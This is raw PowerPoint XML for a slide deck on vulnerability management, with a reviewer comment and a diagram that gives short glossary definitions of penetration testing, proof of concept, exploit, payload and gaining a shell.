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9A2CF91A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2" r:id="rId7"/>
    <p:sldId id="264" r:id="rId8"/>
    <p:sldId id="260" r:id="rId9"/>
    <p:sldId id="261" r:id="rId10"/>
    <p:sldId id="259" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="266" r:id="rId17"/>
    <p:sldId id="267" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21"/>
    <p:sldId id="270" r:id="rId22"/>
  </p:sldIdLst>
  <p:sldSz cx="14630400" cy="8229600"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr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53110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306220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959331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612441" algn="l" defTabSz="65311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26555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91866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571771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224882" algn="l" defTabSz="6531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E402B8-6E65-14C7-8A7B-DDEE82D14DA6}" name="Sally XIE" initials="SX" userId="S::xie_yi1@lilly.com::e8fe64ed-c48d-4704-b6a2-bd9e25ca153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86F"/>
    <a:srgbClr val="1F355E"/>
    <a:srgbClr val="245D38"/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F3AB0-7D6B-47DC-9950-81A2D6C891E1}" v="271" dt="2023-09-19T08:41:4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5" y="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omments/modernComment_100_9A2CF9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967B35-58A1-40B3-A5F2-AC23F33D1C7F}" authorId="{5DE402B8-6E65-14C7-8A7B-DDEE82D14DA6}" created="2023-09-15T07:25:59.995">
    <pc:sldMkLst xmlns:pc="http://schemas.microsoft.com/office/powerpoint/2013/main/command">
      <pc:docMk/>
      <pc:sldMk cId="2586638618" sldId="256"/>
    </pc:sldMkLst>
    <p188:txBody>
      <a:bodyPr/>
      <a:lstStyle/>
      <a:p>
        <a:r>
          <a:rPr lang="en-US"/>
          <a:t>咋没有题目，加一下吧，Vulnerability Management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99A78-1554-438F-B318-5690E1F072D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A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>Pen test</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4380442B-D32A-48C3-9973-32F9B92DED6D}" type="parTrans" cxnId="{6D0E2008-C11F-4189-863A-D3C2BE8C6A99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B8C9466-33F7-4B23-AF67-5BA11C363F0F}" type="sibTrans" cxnId="{6D0E2008-C11F-4189-863A-D3C2BE8C6A99}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>POC</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86594B5D-00B2-47E8-BE05-61E05F58E569}" type="parTrans" cxnId="{FAA62B2D-1710-4EFF-A619-CA9BD2EC6EB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D1276E83-7D0C-4434-85D4-3DF63B818B2A}" type="sibTrans" cxnId="{FAA62B2D-1710-4EFF-A619-CA9BD2EC6EB9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CBCB67B0-74EE-4E99-A47E-D79DC0C6E862}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" dirty="0"/>
            <a:t>EXP</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D25BB85-B75F-4831-9A3F-FF8167FE3BAD}" type="parTrans" cxnId="{F7298D0C-CB0D-4533-B9C5-CA821EBEC4CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D455AF3-4757-4731-A051-18C50C4BDFA0}" type="sibTrans" cxnId="{F7298D0C-CB0D-4533-B9C5-CA821EBEC4CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35D44BD2-8F93-4F20-919D-C82D5F814A1B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Penetration Testing </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
            <a:t>Assessing the security of computer systems, networks, or applications by simulating attacker techniques</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2F1023A-FC5E-4D42-A7A2-17FCF37B0B0C}" type="parTrans" cxnId="{8D404908-6169-477A-B7E3-28B2DC785813}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3C5122D0-2ECB-4506-9D52-4EED0FFCFD8F}" type="sibTrans" cxnId="{8D404908-6169-477A-B7E3-28B2DC785813}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0016D806-8942-4D80-A429-387C526FBB8C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
            <a:t>Payload</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1564CB90-1F6F-42E1-9722-8FA5220C8ECC}" type="parTrans" cxnId="{62D08E67-85C2-4048-8B66-9F9A89974DF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14455781-45CE-4CB5-A5B7-6460411D8F05}" type="sibTrans" cxnId="{62D08E67-85C2-4048-8B66-9F9A89974DF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A185465-5076-47DB-81E4-16FC112950F9}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Proof of Concept </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
            <a:t>A demonstration or evidence showing that a particular vulnerability or issue exists, often in the form of a simple prototype or test.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1ADEB3CE-8FE7-4E91-926C-750F9F66D3EE}" type="parTrans" cxnId="{D348B42D-1052-42DC-A772-FFC652BB6E15}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5955B2D-186B-4BDC-BFEB-DAE7BF6D3140}" type="sibTrans" cxnId="{D348B42D-1052-42DC-A772-FFC652BB6E15}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D65EA37A-9CBD-4CFF-8525-2160C7687A65}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
            <a:t>The malicious part of an exploit, containing the code or instructions that an attacker wants to execute on the target system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1252F8C-B1A0-4AFC-8CCF-2E136F0131CD}" type="parTrans" cxnId="{FC538862-CF04-4AEF-BB42-D09D8A7E2AA1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{76A77E52-4D0D-414B-AABE-FDE7D3ADA16B}" type="sibTrans" cxnId="{FC538862-CF04-4AEF-BB42-D09D8A7E2AA1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56810DB8-FF33-4D50-85FA-D1F6636914E0}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" dirty="0"/>
            <a:t>Exploit </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
            <a:t>A piece of code or technique used to take advantage of a vulnerability or weakness in a system, application, or network.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CACC72E9-E637-47F7-B982-5E8324DB4C7B}" type="parTrans" cxnId="{D743AA4C-A8E1-4B5E-87F0-C50EEA0202FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{072A3A12-FD8F-49AF-8CA4-E80D207D6BFA}" type="sibTrans" cxnId="{D743AA4C-A8E1-4B5E-87F0-C50EEA0202FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2375DDB3-9490-4AE7-8721-B89145E3417A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:srgbClr val="D52B17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01911" tIns="0" rIns="201911" bIns="0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Get shell</a:t>
          </a:r>
          <a:endParaRPr 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DE952457-33EE-46B9-9427-82BE342A9F76}" type="parTrans" cxnId="{E4EA782A-1496-4D25-89E4-06C174A6237E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4BDFA09-D7B7-4D96-B953-BD23789814F7}" type="sibTrans" cxnId="{E4EA782A-1496-4D25-89E4-06C174A6237E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D305B32-9547-4FB7-BAEF-616AD4DDDB5D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Refer to the successful acquisition of a command shell on a target system, providing unauthorized access and control to the attacker</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{443019F5-AFE4-4584-A3CB-AA4E5486584C}" type="parTrans" cxnId="{81B5D0E9-4E0C-461D-B6ED-498082F5FAB3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{627DAB62-973C-4BF0-B872-BC11C15639A6}" type="sibTrans" cxnId="{81B5D0E9-4E0C-461D-B6ED-498082F5FAB3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" type="pres">
      <dgm:prSet presAssocID="{69899A78-1554-438F-B318-5690E1F072DC}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D14E6666-5823-49B2-8436-2ADED0D6F0BB}" type="pres">
      <dgm:prSet presAssocID="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E048BF38-127B-4B16-BAB1-DD519BA74E11}" type="pres">
      <dgm:prSet presAssocID="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CAB69CAC-61C7-4936-91FE-4C252893B0EC}" type="pres">
      <dgm:prSet presAssocID="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5" custScaleX="32793">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0BA78D3E-3511-446D-BD34-C7B5DCA4D2AA}" type="pres">
      <dgm:prSet presAssocID="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6D8A04E3-FDFF-453B-96A6-23A4F5C52E84}" type="pres">
      <dgm:prSet presAssocID="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{51F3E5C1-C9D8-4C07-8A31-E5212FFD7CDB}" type="pres">
      <dgm:prSet presAssocID="{4B8C9466-33F7-4B23-AF67-5BA11C363F0F}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BD0C9C75-45C5-4D36-814C-965FBD4E9EB4}" type="pres">
      <dgm:prSet presAssocID="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F4E3C66B-8F0F-434F-AD19-440B6CF0C4D7}" type="pres">
      <dgm:prSet presAssocID="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{86B53AC1-73D6-428A-BFA1-7CBFF24D431D}" type="pres">
      <dgm:prSet presAssocID="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5" custScaleX="32793">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B1AFAB2B-202E-4D1C-AE87-E09E87652338}" type="pres">
      <dgm:prSet presAssocID="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{06214F4A-CEA2-48A0-A631-9F9F4E2730AE}" type="pres">
      <dgm:prSet presAssocID="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A7559E38-CE0B-4B02-82D4-085A65CD2A74}" type="pres">
      <dgm:prSet presAssocID="{D1276E83-7D0C-4434-85D4-3DF63B818B2A}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B7C05C6B-9882-46C2-8855-22D6138FDADA}" type="pres">
      <dgm:prSet presAssocID="{CBCB67B0-74EE-4E99-A47E-D79DC0C6E862}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30E406B5-2F05-433A-AC37-3433BFC08FB5}" type="pres">
      <dgm:prSet presAssocID="{CBCB67B0-74EE-4E99-A47E-D79DC0C6E862}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AA4AF22E-F540-4E54-9AC7-EB8C57671E4E}" type="pres">
      <dgm:prSet presAssocID="{CBCB67B0-74EE-4E99-A47E-D79DC0C6E862}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5" custScaleX="32793">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EA46CADB-CEDF-48A3-98F1-E61ED5BE5C6B}" type="pres">
      <dgm:prSet presAssocID="{CBCB67B0-74EE-4E99-A47E-D79DC0C6E862}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{62B13D99-42B2-4293-8A91-7F8E86AB5523}" type="pres">
      <dgm:prSet presAssocID="{CBCB67B0-74EE-4E99-A47E-D79DC0C6E862}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B9C291E-566C-4475-AFF2-250395C45E8E}" type="pres">
      <dgm:prSet presAssocID="{3D455AF3-4757-4731-A051-18C50C4BDFA0}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E4644B31-4FF0-4431-9A11-AA31C2C103EE}" type="pres">
      <dgm:prSet presAssocID="{0016D806-8942-4D80-A429-387C526FBB8C}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2EDB6083-A900-4172-BC1F-CD36FD269B0B}" type="pres">
      <dgm:prSet presAssocID="{0016D806-8942-4D80-A429-387C526FBB8C}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{152FD357-02D4-406F-83D5-21DA54811272}" type="pres">
      <dgm:prSet presAssocID="{0016D806-8942-4D80-A429-387C526FBB8C}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5" custScaleX="32793">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{194A78BC-BA97-406D-B4AA-BC1FD405D066}" type="pres">
      <dgm:prSet presAssocID="{0016D806-8942-4D80-A429-387C526FBB8C}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C5256EF4-F028-4B38-A01E-2D9A09E865C6}" type="pres">
      <dgm:prSet presAssocID="{0016D806-8942-4D80-A429-387C526FBB8C}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="3" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B8CFEBC7-C0B9-4D21-8BF3-876CFF1C2F38}" type="pres">
      <dgm:prSet presAssocID="{14455781-45CE-4CB5-A5B7-6460411D8F05}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7AB7C876-4DD8-43A3-BFDE-98BD6CAD3FE4}" type="pres">
      <dgm:prSet presAssocID="{2375DDB3-9490-4AE7-8721-B89145E3417A}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D4717295-2F30-443A-B6BD-BFFE049F9258}" type="pres">
      <dgm:prSet presAssocID="{2375DDB3-9490-4AE7-8721-B89145E3417A}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E09DB192-FC2A-4CFB-B6DC-9871A5EF2CAD}" type="pres">
      <dgm:prSet presAssocID="{2375DDB3-9490-4AE7-8721-B89145E3417A}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5" custFlipHor="1" custScaleX="33558">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:xfrm flipH="1">
          <a:off x="381564" y="5031826"/>
          <a:ext cx="1553371" cy="472320"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{595A8B78-BD41-40C3-84DE-3B443F1586F6}" type="pres">
      <dgm:prSet presAssocID="{2375DDB3-9490-4AE7-8721-B89145E3417A}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{615AE682-DAE0-4A81-B78F-C64F6661BB04}" type="pres">
      <dgm:prSet presAssocID="{2375DDB3-9490-4AE7-8721-B89145E3417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D0E2008-C11F-4189-863A-D3C2BE8C6A99}" srcId="{69899A78-1554-438F-B318-5690E1F072DC}" destId="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" srcOrd="0" destOrd="0" parTransId="{4380442B-D32A-48C3-9973-32F9B92DED6D}" sibTransId="{4B8C9466-33F7-4B23-AF67-5BA11C363F0F}"/>
    <dgm:cxn modelId="{8D404908-6169-477A-B7E3-28B2DC785813}" srcId="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" destId="{35D44BD2-8F93-4F20-919D-C82D5F814A1B}" srcOrd="0" destOrd="0" parTransId="{D2F1023A-FC5E-4D42-A7A2-17FCF37B0B0C}" sibTransId="{3C5122D0-2ECB-4506-9D52-4EED0FFCFD8F}"/>
    <dgm:cxn modelId="{F7298D0C-CB0D-4533-B9C5-CA821EBEC4CE}" srcId="{69899A78-1554-438F-B318-5690E1F072DC}" destId="{CBCB67B0-74EE-4E99-A47E-D79DC0C6E862}" srcOrd="2" destOrd="0" parTransId="{2D25BB85-B75F-4831-9A3F-FF8167FE3BAD}" sibTransId="{3D455AF3-4757-4731-A051-18C50C4BDFA0}"/>
    <dgm:cxn modelId="{ED951D24-CA41-4574-AF6A-BBDC7706A8C0}" type="presOf" srcId="{CBCB67B0-74EE-4E99-A47E-D79DC0C6E862}" destId="{30E406B5-2F05-433A-AC37-3433BFC08FB5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6CBD6325-D1C6-462D-820B-353832A0BBF1}" type="presOf" srcId="{CBCB67B0-74EE-4E99-A47E-D79DC0C6E862}" destId="{AA4AF22E-F540-4E54-9AC7-EB8C57671E4E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{0F5F8728-208F-4D30-91E2-EA64830F0ECD}" type="presOf" srcId="{69899A78-1554-438F-B318-5690E1F072DC}" destId="{D150E4A8-2164-48A5-9917-27CA884BC93E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8A185629-0D7C-4B32-8046-F61C93490EFA}" type="presOf" srcId="{6A185465-5076-47DB-81E4-16FC112950F9}" destId="{06214F4A-CEA2-48A0-A631-9F9F4E2730AE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E4EA782A-1496-4D25-89E4-06C174A6237E}" srcId="{69899A78-1554-438F-B318-5690E1F072DC}" destId="{2375DDB3-9490-4AE7-8721-B89145E3417A}" srcOrd="4" destOrd="0" parTransId="{DE952457-33EE-46B9-9427-82BE342A9F76}" sibTransId="{C4BDFA09-D7B7-4D96-B953-BD23789814F7}"/>
    <dgm:cxn modelId="{FAA62B2D-1710-4EFF-A619-CA9BD2EC6EB9}" srcId="{69899A78-1554-438F-B318-5690E1F072DC}" destId="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" srcOrd="1" destOrd="0" parTransId="{86594B5D-00B2-47E8-BE05-61E05F58E569}" sibTransId="{D1276E83-7D0C-4434-85D4-3DF63B818B2A}"/>
    <dgm:cxn modelId="{D348B42D-1052-42DC-A772-FFC652BB6E15}" srcId="{7CB6FBAE-10FA-4A03-9C6F-56207BDDEEA7}" destId="{6A185465-5076-47DB-81E4-16FC112950F9}" srcOrd="0" destOrd="0" parTransId="{1ADEB3CE-8FE7-4E91-926C-750F9F66D3EE}" sibTransId="{F5955B2D-186B-4BDC-BFEB-DAE7BF6D3140}"/>
    <dgm:cxn modelId="{89362940-D823-4A35-94FE-4090125DDEAC}" type="presOf" srcId="{8D305B32-9547-4FB7-BAEF-616AD4DDDB5D}" destId="{615AE682-DAE0-4A81-B78F-C64F6661BB04}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{38933140-4D9D-41EA-AB79-FC1FFFA80441}" type="presOf" srcId="{31A6FEE0-531D-46B2-AEC2-FA76A26B3F9C}" destId="{CAB69CAC-61C7-4936-91FE-4C252893B0EC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{090AA740-DAE9-4A53-9908-665B4303C318}" type="presOf" srcId="{0016D806-8942-4D80-A429-387C526FBB8C}" destId="{152FD357-02D4-406F-83D5-21DA54811272}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
